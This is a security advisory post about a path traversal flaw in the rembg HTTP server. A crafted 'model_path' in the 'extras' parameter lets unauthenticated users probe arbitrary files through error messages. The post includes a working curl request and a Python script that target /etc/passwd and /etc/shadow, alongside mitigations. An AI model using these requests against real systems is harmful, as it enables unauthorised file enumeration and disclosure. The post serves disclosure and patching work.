Listen to this Post
How the mentioned CVE works:
The vulnerability resides in rembg HTTP server’s handling of the `extras` JSON parameter.
Attackers send a crafted request with a malicious `model_path` parameter.
The `extras` parameter is parsed from URL query string without validation.
It is passed directly to `new_session()` function in s_command.py.
For custom model types like u2net_custom, the `model_path` is extracted.
In `u2net_custom.py`, `download_models()` returns `os.path.abspath(os.path.expanduser(model_path))`.
No path traversal sanitization occurs at this step.
The path then goes to `onnxruntime.InferenceSession()` in `base.py`.
This function attempts to open and read the file as an ONNX model.
If the file exists but is not a valid ONNX protobuf, an error reveals the file’s existence.
If the file does not exist, a “NoSuchFile” error discloses that.
If permissions are insufficient, “Permission denied” reveals the file’s presence.
The root cause is exposing CLI-only custom model feature to HTTP API.
No authentication or input validation protects the `model_path` parameter.
An attacker can read arbitrary system files like /etc/passwd.
Error messages act as a file existence oracle.
The attack requires only a minimal valid PNG image as the file upload.
Server logs confirm the file was read, proving successful path traversal.
dailycve form:
Platform: rembg HTTP server
Version: All versions
Vulnerability: Path traversal
Severity: Medium
date: 2026-04-11
Prediction: 2026-05-15 patch
Analytics under What Undercode Say:
Enumerate file existence via error messages
curl -X POST 'http://localhost:7000/api/remove?extras=%7B%22model_path%22%3A%22%2Fetc%2Fpasswd%22%7D' \
-F "model=u2net_custom" \
-F "file=@/tmp/test.png"
Python script to test multiple paths
import requests, json, urllib.parse
MINIMAL_PNG = bytes([0x89,0x50,0x4E,0x47,0x0D,0x0A,0x1A,0x0A,0x00,0x00,0x00,0x0D,0x49,0x48,0x44,0x52,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x02,0x00,0x00,0x00,0x90,0x77,0x53,0xDE,0x00,0x00,0x00,0x0C,0x49,0x44,0x41,0x54,0x08,0xD7,0x63,0xF8,0xFF,0xFF,0x3F,0x00,0x05,0xFE,0x02,0xFE,0xDC,0xCC,0x59,0xE7,0x00,0x00,0x00,0x00,0x49,0x45,0x4E,0x44,0xAE,0x42,0x60,0x82])
for path in ['/etc/passwd','/etc/shadow']:
extras = json.dumps({"model_path": path})
url = f"http://localhost:7000/api/remove?extras={urllib.parse.quote(extras)}"
r = requests.post(url, files={"file":("test.png",MINIMAL_PNG,"image/png")}, data={"model":"u2net_custom"})
print(path, r.text[:80])
Exploit:
Start rembg server: rembg s --host 0.0.0.0 --port 7000. Send POST request to `/api/remove` with `extras={“model_path”:”/etc/passwd”}` and a valid PNG file. Observe server error “Load model from /etc/passwd failed:Protobuf parsing failed” confirming file read.
Protection from this CVE:
- Disable custom models in HTTP API by filtering session names ending with
_custom. 2. Validate `model_path` against an allowlist of directories (e.g.,~/.u2net). 3. Never expose rembg server directly to internet; use reverse proxy with authentication. 4. Apply vendor patch when available.
Impact:
Unauthenticated remote attackers can read arbitrary files (e.g., /etc/passwd, .env, configs), enumerate file existence and permissions, map infrastructure, and cause denial of service via large file reads. CLI and library usage unaffected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

